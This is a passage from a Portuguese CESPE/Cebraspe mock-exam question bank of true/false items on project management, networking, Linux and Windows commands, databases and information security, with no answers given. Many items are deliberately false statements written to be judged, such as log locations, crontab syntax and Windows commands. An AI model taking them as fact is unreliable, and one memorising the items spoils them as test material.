Disciplinas/Assuntos vinculados: Tecnologia da Informação > COBIT.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Prefeitura de Aracaju - SE / Auditor de Tributos Municipais - Área: Tecnologia da
Informação 1º Simulado / Questão: 27
61. [Q1412012] Dentre as áreas de conhecimento do gerenciamento de projetos, de acordo com o
PMBOK 6, destaca-se a de Integração. O gerenciamento da integração do projeto inclui os
processos e atividades para identificar, definir, combinar, unificar e coordenar os vários processos
e atividades de gerenciamento de projeto dentro dos Grupos de Processos de Gerenciamento do
Projeto. No contexto de gerenciamento de projetos, a integração inclui características de
unificação, consolidação, comunicação e inter-relacionamentos. Estas ações devem ser aplicadas
desde o início do projeto até a sua conclusão. O Gerenciamento da Integração do Projeto inclui
fazer escolhas sobre: identificação das partes interessadas; coleta de seus requisitos; controle do
escopo e do tempo do projeto.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Engenharia de Software.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Prefeitura de Aracaju - SE / Auditor de Tributos Municipais - Área: Tecnologia da
Informação 1º Simulado / Questão: 33
62. [Q1412017] De acordo com o PMBOK 6, as ferramentas do processo de Planejaro
Gerenciamento dos Custos do projeto são Opinião especializada, análise de dados, reuniões e
estimativas de três pontos.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > PMBOK.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Prefeitura de Aracaju - SE / Auditor de Tributos Municipais - Área: Tecnologia da
Informação 1º Simulado / Questão: 36
63. [Q1412020] O Gerenciamento das Comunicações do Projeto inclui os processos necessários
para garantir que as necessidades de informações do projeto e de suas partes interessadas sejam
satisfeitas, com o desenvolvimento de artefatos e a implementação de atividades projetadas para
realizar a troca eficaz de informações. Como parte do processo de comunicação, o emissor é
responsável por transmitir a mensagem, assegurando que as informações comunicadas estão
claras e completas e confirmando que a mensagem foi interpretada corretamente.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Gestão de Projetos.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Prefeitura de Aracaju - SE / Auditor de Tributos Municipais - Área: Tecnologia da
Informação 1º Simulado / Questão: 39
64. [Q1412021] De acordo com o PMBOK 6, as ferramentas do processo de Planejar o
Gerenciamento dos Riscos são: Opinião especializada, Análise de dados, que aborda a análise das
partes interessadas, e reuniões.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > PMBOK.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Prefeitura de Aracaju - SE / Auditor de Tributos Municipais - Área: Tecnologia da
Informação 1º Simulado / Questão: 40
65. [Q1402226] A modelagem dimensional é uma técnica de projeto lógico que é usualmente
usada em bancos orientados a objetos.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Programação.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas da União TCU - BR / Auditor Federal de Controle Externo - 4º
Simulado / Questão: 99
Julgue os próximos itens, relativos à gestão de segurança da informação.
66. [Q1383943] A preparação de um plano de continuidade de negócios pode afetar o propósito
da gestão de riscos de segurança da informação, ao passo que o monitoramento da gestão de riscos
pode resultar em modificação de ferramentas utilizadas, a depender, por exemplo, de como
abordar a continuidade de negócios e sua resiliência diante dos incidentes.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Desenvolvimento de Sistemas.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade
Tecnologia e Informação - 6º Simulado / Questão: 114
A respeito de criptografia, julgue os itens subsequentes.
67. [Q1383940] Chave pública é uma chave de criptografia e(ou) descriptografia conhecida por
todos os elementos que usam a criptografia
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Segurança da Informação.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade
Tecnologia e Informação - 6º Simulado / Questão: 111
68. [Q1383941] Não compete à infraestrutura de chaves públicas brasileira (ICP-Brasil) o papel
de credenciar e descredenciar participantes da cadeia de certificação, mas apenas indicá-los.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Segurança da Informação.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade
Tecnologia e Informação - 6º Simulado / Questão: 112
69. [Q1383931] Em uma rede com todos os computadores ligados a um hub, temos uma topologia
lógica estrela e uma topologia física de barramento.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Redes de computadores.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade
Tecnologia e Informação - 6º Simulado / Questão: 102
70. [Q1383933] Em uma rede em anel, a máquina que possui o token é que poderá transmitir o
sinal.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Redes de computadores.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade
Tecnologia e Informação - 6º Simulado / Questão: 104
71. [Q1383897] Em um software com desenvolvimento no modelo incremental, cada módulo
passará por todas as fases “cascata” de projeto, e será entregue ao cliente um software
operacional. Assim, o cliente receberá parte do produto final em menos tempo.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Desenvolvimento de Sistemas.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade
Tecnologia e Informação - 6º Simulado / Questão: 68
72. [Q1383902] Ainda sobre o DISM, essa ferramenta de linha de comando pode ser utilizada
para adicionar ou remover recursos do Windows. Para consultar os recursos disponíveis para
instalação com o DISM, utiliza-se o comando “Dism /online / Get-Roles”, e para instalar o recurso
utilizamos o comando “Dism /online /Enable-Role /FeatureName:< Nome_do_Recurso >/All”.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade
Tecnologia e Informação - 6º Simulado / Questão: 73
73. [Q1383904] No Windows 10, foi retirada a capacidade de reiniciar em Safe Mode usando a
combinação de teclas Shift+F8, tradicional para o Windows XP e Windows 7, com o objetivo de o
processo de inicialização ser mais rápido. Para que seja possível obrigar o Windows 10 a responder
a Shift+F8, é preciso habilitar esse recurso com o comando “BCDEdit /set {default}
bootmenupolicy legacy” em um prompt de comando elevado, com privilégios administrativos.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Windows.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade
Tecnologia e Informação - 6º Simulado / Questão: 75
74. [Q1383905] No Windows 10, pode-se configurar um endereço IPv4 por meio da ferramenta de
linha de comando Netsh.exe ou mediante cmdlets do PowerShell. Para adicionar o endereço IPv4
192.168.17.1/24 com gateway 192.168.0.1, deve ser utilizado, para o comando Netsh, a seguinte
sintaxe: Netsh -InterfaceAlias Ethernet -Source static -IPAddress 192.168.17.1 -PrefixLength 24 -
DefaultGateway 192.168.0.1
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Windows.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade
Tecnologia e Informação - 6º Simulado / Questão: 76
75. [Q1383915] No Linux, o arquivo /etc/fstab é utilizado para configurar todos os dispositivos e
seus pontos de montagem do sistema.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade
Tecnologia e Informação - 6º Simulado / Questão: 86
76. [Q1383916] No Linux, podemos utilizar o comando swapoff para desabilitar arquivos para
paginação e troca em determinados dispositivos.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade
Tecnologia e Informação - 6º Simulado / Questão: 87
77. [Q1383922]Em um sistema operacional Linux, os principais arquivos de logs ficam
armazenados no diretório /etc/log.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade
Tecnologia e Informação - 6º Simulado / Questão: 93
78. [Q1383923] Em um sistema operacional Linux, o comando usermod é utilizado para modificar
uma conta de usuário. Com ele, é possível alterar o diretório home de um usuário utilizando o
parâmetro -d.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade
Tecnologia e Informação - 6º Simulado / Questão: 94
79. [Q1383925] Em um sistema operacional Linux, para executar um script /
opt/scripts/auditoria.sh apenas uma vez por semana, é preciso cadastrar uma tarefa agendada no
/etc/crontab, adicionando uma nova linha, com os seguintes parâmetros: * * * * 7 root
/opt/scripts/auditoria.sh
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade
Tecnologia e Informação - 6º Simulado / Questão: 96
80. [Q1383926] Para definir o nome da máquina (hostname) em um sistema operacional Linux,
utilizamos o comando host < novo_da_maquina >.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico - Especialidade
Tecnologia e Informação - 6º Simulado / Questão: 97
81. [Q1349314] As topologias em estrela, anel e malha têm como uma de suas características a
utilização de conexões ponto a ponto.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Redes de computadores.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 5º Simulado / Questão: 101
82. [Q1349321] Considerando os vários tipos e tecnologias de meios de transmissão, um escrivão
de polícia foi designado para implementar uma rede local utilizando tecnologia sem fio. A correta
escolha foi utilizar o padrão IEEE 802.11.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Redes de computadores.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 5º Simulado / Questão: 108
83. [Q1349333] Uma organização deverá definir qual política de controle de acesso irá
implementar, pois as políticas são mutuamente exclusivas, não podendo coexistir em uma mesma
organização.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Segurança da Informação.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 5º Simulado / Questão: 120
A respeito do sistema operacional Windows, julgue o item a seguir.
84. [Q1349305] O Windows Server 2016 é uma versão do sistema operacional lançada pela
Microsoft como sendo pronto para utilização em ambientes de computação em nuvem. Dentre as
opções de instalação, podemos destacar a Server Core, que trata de uma instalação menor, a qual
inclui os componentes principais do Windows Server, oferece suporte a todas as funções de
servidor e inclui uma GUI local.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Windows.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 5º Simulado / Questão: 95
A respeito da estrutura de diretórios do sistema operacional Linux, julgue o item a seguir.
85. [Q1349300] No diretório /root, estão os arquivos essenciais do sistema, como aplicativos,
utilitários para administração do sistema.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 5º Simulado / Questão: 90
86. [Q1349296] Em um sistema Linux, um usuário configurou o modo de proteção para um
arquivo indicado pela combinação rwxr-xr-x, significando que somente usuários que não são
proprietários podem escrever, ler e executar o arquivo.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 5º Simulado / Questão: 86
A respeito do firewall do Windows, julgue o item a seguir.
87. [Q1349294] É utilizado o comando netsh para exibir ou modificar a configuração de rede de
um computador em execução no momento. O comando netsh advfirewall set allprofiles state off é
utilizado para desabilitar todos os perfis existentes no firewal do Windows.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Windows.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 5º Simulado / Questão: 84
A respeito do sistema operacional Windows, julgue o item a seguir.
88. [Q1349293] É utilizado o comando chkdsk para exibir o status de algum volume ou partição
de um disco rígido, presente no computador, sem corrigir qualquer erro.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Windows.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 5º Simulado / Questão: 83
Acerca do sistema operacional Windows, julgue o seguinte item.
89. [Q1349288] Em um sistema operacional Windows, utiliza-se comando net start e net stop
para iniciar ou parar serviços do sistema diretamente do prompt de comando.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Windows.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 5º Simulado / Questão: 79
Acerca das licenças de software, software livre e código aberto, julgue o seguinte item.
90. [Q1349280] As licenças GPL, em inglês GNU General Public License, ou em português
Licença Pública Geral GNU, são utilizadas por projetos de software livre e de código aberto. O
Kernel Linux é um exemplo dos que utilizam a licença GPL.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 5º Simulado / Questão: 74
Sobre arquitetura cliente- servidor multicamadas, julgue os itens.
91. [Q1349260] O conceito de sistema distribuído pode ser definido como um sistema que possui
componentes localizados em computadores interligados em rede e que se comunicam e coordenam
suas ações por meio da troca de mensagens entre estes componentes.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Cliente/Servidor.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 5º Simulado / Questão: 61
92. [Q1349263] O modelo de comunicação utilizado em uma arquitetura cliente-servidor segue a
estratégia de requisição resposta,em que, em geral, o servidor inicia a requisição e o cliente envia
uma resposta.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Cliente/Servidor.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 5º Simulado / Questão: 64
93. [Q1349250] A Unidade Central (UC) do processado é responsável por operações lógicas
utilizando, por exemplo, os operadores AND, NOT, OR e XOR.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Unidade Central de Processamento.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 5º Simulado / Questão: 52
94. [Q1349257] O Barramento de um computador tem a finalidade de conectar os vários
componentes internos, como o processador, a memória e os dispositivos de entrada e saída.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Arquitetura de Computadores.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 5º Simulado / Questão: 59
A respeito da definição de banco de dados e linguagem SQL, julgue os itens a seguir.
95. [Q1345663] O conjunto de comandos que lidam com os objetos, criando bancos de dados,
esquemas, tabelas, atributos etc., está presente na DML.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linguagem SQL.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área:
Controle Externo - 5º Simulado / Questão: 128
A respeito dos conceitos de Mineração de Dados e CRISP-DM, julgue o item a seguir.
96. [Q1345662] Durante a fase de compreensão do negócio é preciso organizar e documentar
todos os dados que se encontram disponíveis, além de explorar e verificar a qualidade desses
dados.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Data Mining.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área:
Controle Externo - 5º Simulado / Questão: 127
A respeito da álgebra relacional e do banco de dados, julgue o item a seguir.
97. [Q1345655] Na álgebra relacional existem os operadores tradicionais e os operadores
relacionais, onde cada um apresenta a sua função e uma representação na forma como as
consultas serão construídas. A operação de produto cartesiano é uma operação que resultará em
uma nova relação que contenha todas as tuplas que pertençam à primeira relação e não pertença à
segunda.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Banco de Dados.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área:
Controle Externo - 5º Simulado / Questão: 122
A respeito do conceito de generalização e especialização em banco de dados, julgue o item a seguir.
98. [Q1343870] A especialização, em banco de dados, é um processo no qual suprimimos as
diferenças entre os diversos tipos de entidade e destacamos as características comuns e
generalizamos em uma única superclasse.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Banco de Dados.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área:
Controle Externo - 5º Simulado / Questão: 36
99. [Q1343865] Para garantir a integridade dos dados em um sistema de banco de dados, as
transações precisam garantir a verificação de várias propriedades. Uma delas é a propriedade de
consistência, utilizada para garantir que uma transação será executada totalmente ou não será
executada.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Segurança da Informação.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área:
Controle Externo - 5º Simulado / Questão: 31
100. [Q1343867] Uma cardinalidade entre um conjunto de entidades A e B de uma associação N-
N, uma entidade A é associada, no máximo, a 1 entidade B, e uma entidade B é associada, no
mínimo a 1 entidade A.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Algoritmos.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área:
Controle Externo - 5º Simulado / Questão: 33
101. [Q1319271] Dentre os conceitos de banco de dados relacional, devemos lembrar das
restrições de integridade. As restrições de integridade possuem o objetivo de garantir a exatidão e
a consistência dos dados em um banco de dados relacional.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Segurança da Informação.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área:
Controle Externo - 4º Simulado / Questão: 122
102. [Q1319275] A respeito das técnicas de modelagem dimensional de dados, devemos pontuar
o Esquema Estrela (star schema), em que as tabelas se encontraram dispostas da seguinte forma: a
tabela de fatos mais ao centro relacionando-se com as diversas outras tabelas de dimensão, que
estão dispostas em torno da tabela de fatos.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Banco de Dados.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área:
Controle Externo - 4º Simulado / Questão: 126
103. [Q1319280] A detecção de anomalias consiste em utilizar técnicas para identificar padrões
que fogem do comportamento esperado, sendo que estes podem ser eventos ou observações que
geram a suspeita de problemas.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Segurança da Informação.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área:
Controle Externo - 4º Simulado / Questão: 131
104. [Q1291758] Quando nos referimos à modelagem de dados, o modelo conceitual representa o
mais alto nível da estrutura de um banco de dados. Na etapa de criação do modelo conceitual,
entram em cena os detalhes técnicos do projeto de um banco de dados, como os dados serão
armazenados e quais políticas de segurança serão implementadas.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Desenvolvimento de Sistemas.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas da União TCU - BR / Auditor Federal de Controle Externo - 2º
Simulado / Questão: 93
105. [Q1291759] Dados estruturados são aqueles organizados e representados com uma
estrutura flexível e dinâmica, não possuindo uma estrutura mais rígida.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Estrutura de Dados.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas da União TCU - BR / Auditor Federal de Controle Externo - 2º
Simulado / Questão: 94
106. [Q1291764] Assim como em bancos transacionais, a modelagem de bancos de dados
multidimensionais baseia-se na utilização de um modelo relacional, com entidades, atributos e
relacionamentos.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Banco de Dados.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas da União TCU - BR / Auditor Federal de Controle Externo - 2º
Simulado / Questão: 99
107. [Q1282651] Um exemplo de tipo de ataque a uma aplicação Web é XSS (Cross-Site
Scripting) baseado na inclusão de código malicioso no servidor, em que as requisições realizadas
pelos usuários sãorespondidas utilizando-se fontes de dados não confiáveis.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Desenvolvimento de Sistemas.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 4º Simulado / Questão: 114
108. [Q1282657] Um esquema de encriptação é considerado computacionalmente seguro se: I –
O custo para quebrar a cifra ultrapassa o valor da informação encriptada; ou II – O tempo exigido
para quebrar a cifra supera o tempo de vida útil da informação.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Criptografia, Assinatura e Certificado Digitais.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 4º Simulado / Questão: 120
109. [Q1282641] O modelo de arquitetura em nuvem que provê serviços de infraestrutura como
CPU, memória e armazenamento é conhecida como IaaS.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Processador.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 4º Simulado / Questão: 104
110. [Q1282642] Em sistemas de armazenamento, normalmente, a controladora de disco suporta
RAID (Redundant Array of Independent Disks, ou seja, conjunto redundante de discos
independentes). No caso de os dados serem armazenados nos discos por meio da técnica de
mirroring, o RAID será do tipo RAID
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > RAID.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 4º Simulado / Questão: 105
111. [Q1282643] A técnica de mirroring ou espelhamento é quando os dados serão armazenados
de forma dividida nos discos. Quando se utiliza esse tipo de RAID, os discos serão vistos como se
fossem um único no sistema.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > RAID.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 4º Simulado / Questão: 106
112. [Q1282609] Em um sistema Windows, é possível abrir o Editor de Registro através do
comando regedit a ser digitado no Executar.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Windows.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 4º Simulado / Questão: 72
113. [Q1282612] Em um sistema Windows, é possível realizar o mapeamento de um
compartilhamento de rede através do prompt de comando. Para mapear o compartilhamento
\192.168.0.1\ pasta_compartilhada a unidade G:, é utilizado o seguinte comando net use G:
\192.168.0.1\pasta_compartilhada / PERSISTENTE:YES.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Redes de computadores.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 4º Simulado / Questão: 75
114. [Q1282616] Os sistemas operacionais Windows, em qualquer versão, não possuem o
conceito do usuário administrador, uma vez que todos os usuários criados já possuem privilégios
irrestritos ao sistema.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Windows.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 4º Simulado / Questão: 79
115. [Q1282617] Em um sistema Windows, podemos usar o utilitário rsync com o objetivo de
realizar a sincronização de arquivos entre computadores, não sendo suportado pelo Windows.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Windows.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 4º Simulado / Questão: 80
116. [Q1282619] No prompt de comando do Windows, é possível encerrar uma ou mais tarefas ou
processos através do comando kill.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Windows.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 4º Simulado / Questão: 82
117. [Q1282628] Em um sistema Linux, para listar os diretórios, subdiretórios e arquivos
presentes em um diretório /home/usuário, é preciso executar o comando ls -la /home/usuario.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 4º Simulado / Questão: 91
118. [Q1282634] Em um sistema Linux, os dispositivos são representados através de arquivos,
como discos rígidos que são representados por um arquivo sda ou sdb, esses arquivos ficam
armazenados no diretório /proc.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 4º Simulado / Questão: 97
119. [Q1282605] Um dos princípios do desenvolvimento ágil é ter em mente que os requisitos do
sistema não devem mudar. Dessa forma, haverá mais estabilidade na solução de software
desenvolvida.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Desenvolvimento de Sistemas.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 4º Simulado / Questão: 68
120. [Q1282590] O Hexadecimal ABC convertido para base binária resulta em 101010111100.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Arquitetura de Computadores.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 4º Simulado / Questão: 53
121. [Q1282592] Em relação aos sistemas, uma limitação no sistema de arquivos NTFS é de não
suportar nomes de arquivos e pastas com mais de 1.024 caracteres.
c) Certo
e) Errado
